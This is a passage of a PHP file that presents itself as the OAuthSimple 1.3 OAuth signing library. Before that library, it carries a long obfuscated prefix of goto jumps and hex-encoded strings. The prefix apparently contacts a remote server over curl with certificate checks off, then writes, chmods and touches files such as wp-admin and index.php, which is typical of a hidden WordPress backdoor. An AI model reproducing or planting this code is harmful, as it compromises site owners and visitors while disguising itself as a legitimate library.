$UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?> * @copyright unitedHeroes.net 2011 * @version 1.3 * @license See OAuthSimple_license.txt * */ class OAuthSimple { private $_secrets; private $_default_signature_method; private $_action; private $_nonce_chars; /** * Constructor * * @access public * @param api_key (String) The API Key (sometimes referred to as the consumer key) This value is usually supplied by the site you wish to use. * @param shared_secret (String) The shared secret. This value is also usually provided by the site you wish to use. * @return OAuthSimple (Object) */ function __construct ($APIKey = "", $sharedSecret=""){ if (!empty($APIKey)) { $this->_secrets['consumer_key'] = $APIKey; } if (!empty($sharedSecret)) { $this->_secrets['shared_secret'] = $sharedSecret; } $this->_default_signature_method = "HMAC-SHA1"; $this->_action = "GET"; $this->_nonce_chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; return $this; } /** * Reset the parameters and URL * * @access public * @return OAuthSimple (Object) */ public function reset() { $this->_parameters = Array(); $this->path = NULL; $this->sbs = NULL; return $this; } /** * Set the parameters either from a hash or a string * * @access public * @param(string, object) List of parameters for the call, this can either be a URI string (e.g. "foo=bar&gorp=banana" or an object/hash) * @return OAuthSimple (Object) */ public function setParameters ($parameters=Array()) { if (is_string($parameters)) { $parameters = $this->_parseParameterString($parameters); } if (empty($this->_parameters)) { $this->_parameters = $parameters; } else if (!empty($parameters)) { $this->_parameters = array_merge($this->_parameters,$parameters); } if (empty($this->_parameters['oauth_nonce'])) { $this->_getNonce(); } if (empty($this->_parameters['oauth_timestamp'])) { $this->_getTimeStamp(); } if (empty($this->_parameters['oauth_consumer_key'])) { $this->_getApiKey(); } if (empty($this->_parameters['oauth_token'])) { $this->_getAccessToken(); } if (empty($this->_parameters['oauth_signature_method'])) { $this->setSignatureMethod(); } if (empty($this->_parameters['oauth_version'])) { $this->_parameters['oauth_version']="1.0"; } return $this; } /** * Convenience method for setParameters * * @access public * @see setParameters */ public function setQueryString ($parameters) { return $this->setParameters($parameters); } /** * Set the target URL (does not include the parameters) * * @param path (String) the fully qualified URI (excluding query arguments) (e.g "http://example.org/foo") * @return OAuthSimple (Object) */ public function setURL ($path) { if (empty($path)) { throw new OAuthSimpleException('No path specified for OAuthSimple.setURL'); } $this->_path=$path; return $this; } /** * Convenience method for setURL * * @param path (String) * @see setURL */ public function setPath ($path) { return $this->_path=$path; } /** * Set the "action" for the url, (e.g. GET,POST, DELETE, etc.) * * @param action (String) HTTP Action word. * @return OAuthSimple (Object) */ public function setAction ($action) { if (empty($action)) { $action = 'GET'; } $action = strtoupper($action); if (preg_match('/[^A-Z]/',$action)) { throw new OAuthSimpleException('Invalid action specified for OAuthSimple.setAction'); } $this->_action = $action; return $this; } /** * Set the signatures (as well as validate the ones you have) * * @param signatures (object) object/hash of the token/signature pairs {api_key:, shared_secret:, oauth_token: oauth_secret:} * @return OAuthSimple (Object) */ public function signatures ($signatures) { if (!empty($signatures) && !is_array($signatures)) { throw new OAuthSimpleException('Must pass dictionary array to OAuthSimple.signatures'); } if (!empty($signatures)) { if (empty($this->_secrets)) { $this->_secrets=Array(); } $this->_secrets=array_merge($this->_secrets,$signatures); } if (isset($this->_secrets['api_key'])) { $this->_secrets['consumer_key'] = $this->_secrets['api_key']; } if (isset($this->_secrets['access_token'])) { $this->_secrets['oauth_token'] = $this->_secrets['access_token']; } if (isset($this->_secrets['access_secret'])) { $this->_secrets['oauth_secret'] = $this->_secrets['access_secret']; } if (isset($this->_secrets['access_token_secret'])) { $this->_secrets['oauth_secret'] = $this->_secrets['access_token_secret']; } if (empty($this->_secrets['consumer_key'])) { throw new OAuthSimpleException('Missing required consumer_key in OAuthSimple.signatures'); } if (empty($this->_secrets['shared_secret'])) { throw new OAuthSimpleException('Missing requires shared_secret in OAuthSimple.signatures'); } if (!empty($this->_secrets['oauth_token']) && empty($this->_secrets['oauth_secret'])) { throw new OAuthSimpleException('Missing oauth_secret for supplied oauth_token in OAuthSimple.signatures'); } return $this; } public function setTokensAndSecrets($signatures) { return $this->signatures($signatures); } /** * Set the signature method (currently only Plaintext or SHA-MAC1) * * @param method (String) Method of signing the transaction (only PLAINTEXT and SHA-MAC1 allowed for now) * @return OAuthSimple (Object) */ public function setSignatureMethod ($method="") { if (empty($method)) { $method = $this->_default_signature_method; } $method = strtoupper($method); switch($method) { case 'PLAINTEXT': case 'HMAC-SHA1': $this->_parameters['oauth_signature_method']=$method; break; default: throw new OAuthSimpleException ("Unknown signing method $method specified for OAuthSimple.setSignatureMethod"); break; } return $this; } /** sign the request * * note: all arguments are optional, provided you've set them using the * other helper functions. * * @param args (Array) hash of arguments for the call {action, path, parameters (array), method, signatures (array)} all arguments are optional. * @return (Array) signed values */ public function sign($args=array()) { if (!empty($args['action'])) { $this->setAction($args['action']); } if (!empty($args['path'])) { $this->setPath($args['path']); } if (!empty($args['method'])) { $this->setSignatureMethod($args['method']); } if (!empty($args['signatures'])) { $this->signatures($args['signatures']); } if (empty($args['parameters'])) { $args['parameters']=array(); } $this->setParameters($args['parameters']); $normParams = $this->_normalizedParameters(); $this->_parameters['oauth_signature'] = $this->_generateSignature($normParams); return Array ( 'parameters' => $this->_parameters, 'signature' => self::_oauthEscape($this->_parameters['oauth_signature']), 'signed_url' => $this->_path . '?' . $this->_normalizedParameters(), 'header' => $this->getHeaderString(), 'sbs'=> $this->sbs ); } /** * Return a formatted "header" string * * NOTE: This doesn't set the "Authorization: " prefix, which is required. * It's not set because various set header functions prefer different * ways to do that. * * @param args (Array) * @return $result (String) */ public function getHeaderString ($args=array()) { if (empty($this->_parameters['oauth_signature'])) { $this->sign($args); } $result = 'OAuth '; foreach ($this->_parameters as $pName => $pValue) { if (strpos($pName,'oauth_') !== 0 || $pName == 'oauth_token_secret2') { continue; } if (is_array($pValue)) { foreach ($pValue as $val) { $result .= $pName .'="' . self::_oauthEscape($val) . '", '; } } else { $result .= $pName . '="' . self::_oauthEscape($pValue) . '", '; } } return preg_replace('/, $/','',$result); } private function _parseParameterString ($paramString) { $elements = explode('&',$paramString); $result = array(); foreach ($elements as $element) { list ($key,$token) = explode('=',$element); if ($token) { $token = urldecode($token); } if (!empty($result[$key])) { if (!is_array($result[$key])) { $result[$key] = array($result[$key],$token); } else { array_push($result[$key],$token); } } else $result[$key]=$token; } return $result; } private static function _oauthEscape($string) { if ($string === 0) { return 0; } if ($string == '0') { return '0'; } if (strlen($string) == 0) { return ''; } if (is_array($string)) { throw new OAuthSimpleException('Array passed to _oauthEscape'); } $string = rawurlencode($string); $string = str_replace('+','%20',$string); $string = str_replace('!','%21',$string); $string = str_replace('*','%2A',$string); $string = str_replace('\'','%27',$string); $string = str_replace('(','%28',$string); $string = str_replace(')','%29',$string); return $string; } private function _getNonce($length=5) { $result = ''; $cLength = strlen($this->_nonce_chars); for ($i=0; $i < $length; $i++) { $rnum = rand(0,$cLength); $result .= substr($this->_nonce_chars,$rnum,1); } $result = md5($result); $this->_parameters['oauth_nonce'] = $result; return $result; } private function _getApiKey() { if (empty($this->_secrets['consumer_key'])) { throw new OAuthSimpleException('No consumer_key set for OAuthSimple'); } $this->_parameters['oauth_consumer_key']=$this->_secrets['consumer_key']; return $this->_parameters['oauth_consumer_key']; } private function _getAccessToken() { if (!isset($this->_secrets['oauth_secret'])) { return ''; } if (!isset($this->_secrets['oauth_token'])) { throw new OAuthSimpleException('No access token (oauth_token) set for OAuthSimple.'); } $this->_parameters['oauth_token'] = $this->_secrets['oauth_token']; return $this->_parameters['oauth_token']; } private function _getTimeStamp() { return $this->_parameters['oauth_timestamp'] = time(); } private function _normalizedParameters() { $normalized_keys = array(); $return_array = array(); foreach ( $this->_parameters as $paramName=>$paramValue) { if (!preg_match('/\w+_secret/',$paramName) OR (strpos($paramValue, '@') !== 0 && !file_exists(substr($paramValue, 1))) ) { if (is_array($paramValue)) { $normalized_keys[self::_oauthEscape($paramName)] = array(); foreach($paramValue as $item) { array_push($normalized_keys[self::_oauthEscape($paramName)], self::_oauthEscape($item)); } } else { $normalized_keys[self::_oauthEscape($paramName)] = self::_oauthEscape($paramValue); } } } ksort($normalized_keys); foreach($normalized_keys as $key=>$val) { if (is_array($val)) { sort($val); foreach($val as $element) { array_push($return_array, $key . "=" . $element); } } else { array_push($return_array, $key .'='. $val); } } return join("&", $return_array); } private function _generateSignature () { $secretKey = ''; if(isset($this->_secrets['shared_secret'])) { $secretKey = self::_oauthEscape($this->_secrets['shared_secret']); } $secretKey .= '&'; if(isset($this->_secrets['oauth_secret'])) { $secretKey .= self::_oauthEscape($this->_secrets['oauth_secret']); } switch($this->_parameters['oauth_signature_method']) { case 'PLAINTEXT': return urlencode($secretKey);; case 'HMAC-SHA1': $this->sbs = self::_oauthEscape($this->_action).'&'.self::_oauthEscape($this->_path).'&'.self::_oauthEscape($this->_normalizedParameters()); return base64_encode(hash_hmac('sha1',$this->sbs,$secretKey,TRUE)); default: throw new OAuthSimpleException('Unknown signature method for OAuthSimple'); break; } } } if (!class_exists('OAuthSimpleException')) { class OAuthSimpleException extends Exception { public function __construct($err, $isDebug = FALSE) { self::log_error($err); if ($isDebug) { self::display_error($err, TRUE); } } public static function log_error($err) { error_log($err, 0); } public static function display_error($err, $kill = FALSE) { print_r($err); if ($kill === FALSE) { die(); } } } }